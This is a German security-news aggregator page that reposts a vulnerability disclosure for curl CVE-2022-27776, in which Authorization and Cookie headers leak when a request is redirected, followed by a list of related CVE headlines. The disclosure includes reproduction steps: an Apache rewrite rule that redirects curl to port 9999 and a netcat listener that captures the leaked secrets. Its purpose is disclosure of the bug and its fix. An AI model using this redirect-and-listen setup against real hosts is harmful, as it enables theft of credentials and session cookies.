Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ curl: CVE-2022-27776: Auth/cookie leak on redirect

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š curl: CVE-2022-27776: Auth/cookie leak on redirect


๐Ÿ’ก Newskategorie: Sicherheitslรผcken
๐Ÿ”— Quelle: vulners.com


image
Summary: Curl can be coaxed to leak Authorisation / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privileged port such as 9999 on the same host). Steps To Reproduce: Configure for example Apache2 to perform redirect with mod_rewrite: RewriteCond %{HTTP_USER_AGENT} "^curl/" RewriteRule ^/redirectpoc http://hostname.tld:9999 [R=301,L] ... the attacker could also use .htpasswd file to do so. Set up netcat to listen for the incoming secrets: while true; do echo -ne 'HTTP/1.1 404 nope\r\nContent-Length: 0\r\n\r\n' | nc -v -l -p 9999; done curl-L -H "Authorization: secrettoken" -H "Cookie: secretcookie" https://hostname.tld/redirectpoc The redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port: GET / HTTP/1.1 Host: hostname.tld:9999 User-Agent: curl/7.83.0-DEV Accept: */* Authorization: secrettoken Cookie: secretcookie The attack could also use HTTPS and a valid certificate, In this case the leaked headers are of course only be visible to the listening http server. This vulnerability is quite similar to CVE-2022-27774 and the fix is similar too: If the protocol or port number differs from the original request strip the Authorization and Cookie headers. This bug appears to be here:... ...



๐Ÿ“Œ curl: Buffer overflow and affected url:-https://github.com/curl/curl/blob/master/docs/examples/hsts-preload.c


๐Ÿ“ˆ 32.65 Punkte

๐Ÿ“Œ CVE-2023-46218 | cURL up to 8.4.0 Cookie lib/cookie.c Curl_cookie_add information disclosure (DLA 3692-1)


๐Ÿ“ˆ 32.15 Punkte

๐Ÿ“Œ curl: cookie is sent on redirect


๐Ÿ“ˆ 30.61 Punkte

๐Ÿ“Œ curl: Credential leak on redirect


๐Ÿ“ˆ 27.13 Punkte

๐Ÿ“Œ Bugtraq: [CVE-2016-6582] Doorkeeper gem does not revoke tokens & uses wrong auth/auth method


๐Ÿ“ˆ 24.55 Punkte

๐Ÿ“Œ Bugtraq: [CVE-2016-6582] Doorkeeper gem does not revoke tokens & uses wrong auth/auth method


๐Ÿ“ˆ 24.55 Punkte

๐Ÿ“Œ Low CVE-2019-16751: Devise token auth project Devise token auth


๐Ÿ“ˆ 24.55 Punkte

๐Ÿ“Œ Medium CVE-2020-14068: Mk-auth Mk-auth


๐Ÿ“ˆ 24.55 Punkte

๐Ÿ“Œ Low CVE-2020-14071: Mk-auth Mk-auth


๐Ÿ“ˆ 24.55 Punkte

๐Ÿ“Œ Medium CVE-2020-14069: Mk-auth Mk-auth


๐Ÿ“ˆ 24.55 Punkte

๐Ÿ“Œ High CVE-2020-14070: Mk-auth Mk-auth


๐Ÿ“ˆ 24.55 Punkte

๐Ÿ“Œ High CVE-2020-14072: Mk-auth Mk-auth


๐Ÿ“ˆ 24.55 Punkte

๐Ÿ“Œ Low CVE-2021-29435: Trestle-auth project Trestle-auth


๐Ÿ“ˆ 24.55 Punkte

๐Ÿ“Œ CVE-2023-6651 | code-projects Matrimonial Site 1.0 /auth/auth.php username sql injection


๐Ÿ“ˆ 24.55 Punkte

๐Ÿ“Œ CVE-2015-10129 | planet-freo up to 20150116 admin/inc/auth.inc.php auth comparison


๐Ÿ“ˆ 24.55 Punkte

๐Ÿ“Œ LastPass now supports 2FA auth, completely undermines 2FA auth


๐Ÿ“ˆ 23.37 Punkte

๐Ÿ“Œ Moodle up to 2.6.11/2.7.10/2.8.8/2.9.2 DB Profile auth/db/auth.php cross site scripting


๐Ÿ“ˆ 23.37 Punkte

๐Ÿ“Œ Teclib GLPI up to 9.4.1.0 inc/auth.class.php Auth::checkPassword() weak authentication


๐Ÿ“ˆ 23.37 Punkte

๐Ÿ“Œ Moodle bis 2.6.11/2.7.10/2.8.8/2.9.2 DB Profile Handler auth/db/auth.php Cross Site Scripting


๐Ÿ“ˆ 23.37 Punkte

๐Ÿ“Œ Moodle bis 2.6.11/2.7.10/2.8.8/2.9.2 DB Profile Handler auth/db/auth.php Cross Site Scripting


๐Ÿ“ˆ 23.37 Punkte

๐Ÿ“Œ curl: CVE-2023-23914: curl HSTS ignored on multiple requests


๐Ÿ“ˆ 22.94 Punkte

๐Ÿ“Œ curl: [Critical] Curl CVE-2023-38545 vulnerability code changes are disclosed on the internet


๐Ÿ“ˆ 22.94 Punkte

๐Ÿ“Œ CVE-2018-13257 | BlackBoard Learn 2018-07-02 bb-auth-provider-cas Authentication Module HTTP Host Header redirect


๐Ÿ“ˆ 22.54 Punkte

๐Ÿ“Œ Vuln: cURL/libcURL CVE-2016-8615 Cookie Injection Security Bypass Vulnerability


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ Vuln: cURL/libcURL CVE-2016-8615 Cookie Injection Security Bypass Vulnerability


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ CVE-2023-38546 | cURL up to 8.3.0 Cookie file inclusion (FEDORA-2023-fef2b8da32)


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ curl: CVE-2023-38546: cookie injection with none file


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ curl: CVE-2023-46218: cookie mixed case PSL bypass


๐Ÿ“ˆ 22.11 Punkte

๐Ÿ“Œ curl: Invalid write (or double free) triggers curl command line tool crash


๐Ÿ“ˆ 21.77 Punkte

๐Ÿ“Œ curl: curl overwrites local file with -J option if file non-readable, but file writable.


๐Ÿ“ˆ 21.77 Punkte

๐Ÿ“Œ curl: Parallel upload hangs curl if upload file not found


๐Ÿ“ˆ 21.77 Punkte

๐Ÿ“Œ curl: error parse uri path in curl


๐Ÿ“ˆ 21.77 Punkte











matomo